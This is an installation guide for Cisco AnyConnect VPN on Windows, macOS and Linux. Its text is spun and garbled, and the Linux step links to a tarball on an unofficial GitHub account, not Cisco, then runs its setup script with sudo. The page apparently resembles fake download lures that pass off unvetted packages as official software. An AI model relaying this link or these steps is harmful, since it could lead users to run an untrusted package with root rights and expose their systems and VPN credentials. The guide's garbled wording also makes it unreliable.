Download & Install Cisco Inc. AnyConnect is a simple procedure if you follow the directions below.
Requirements
Before the user begin, confirm the below requirements:
- Operating system requirements: Windows 10/11, Mac OS, or Ubuntu/CentOS.
- Elevated permissions on the computer.
- network connectivity for the transfer.
Download procedure
1. Open a web browser such as Google Chrome, FF, or Edge Chromium.
2. Go to the official site or your enterprise portal.
3. Locate the AnyConnect Secure Mobility installer for your platform.
4. Click the get button and save the package.
Verify the download
Once the download process, check the package:
- Size should agree with the published value.
- If available, confirm the signature.
Install on Windows
1. Right-click the setup file and choose Run as administrator.
2. Follow the on-screen steps:
- Accept the EULA.
- Choose the recommended features.
3. Finalize the install and log off and on if required.
Install on macOS
1. Open the dmg and double-click the package.
2. Follow the installation prompts, enter administrator credentials when asked.
3. Allow any security exceptions in macOS settings if necessary.
Install on Linux
1. Extract the tarball https://github.com/ancvpn/Cisco-AnyConnect/releases if packed.
2. Run the setup script with elevated rights, for example:
sudo ./vpn_install.sh
3. Follow the console messages to complete the setup.
Connect to a VPN
1. Launch the AnyConnect application.
2. Enter the VPN server hostname.
3. Provide your credentials and any multi-factor verification.
4. Click Establish connection and verify the connection status.
Troubleshooting
If you encounter issues:
- Verify network access.
- Power cycle the software.
- Uninstall and reinstall the software.
- Consult the system logs for errors and search Cisco documentation. |
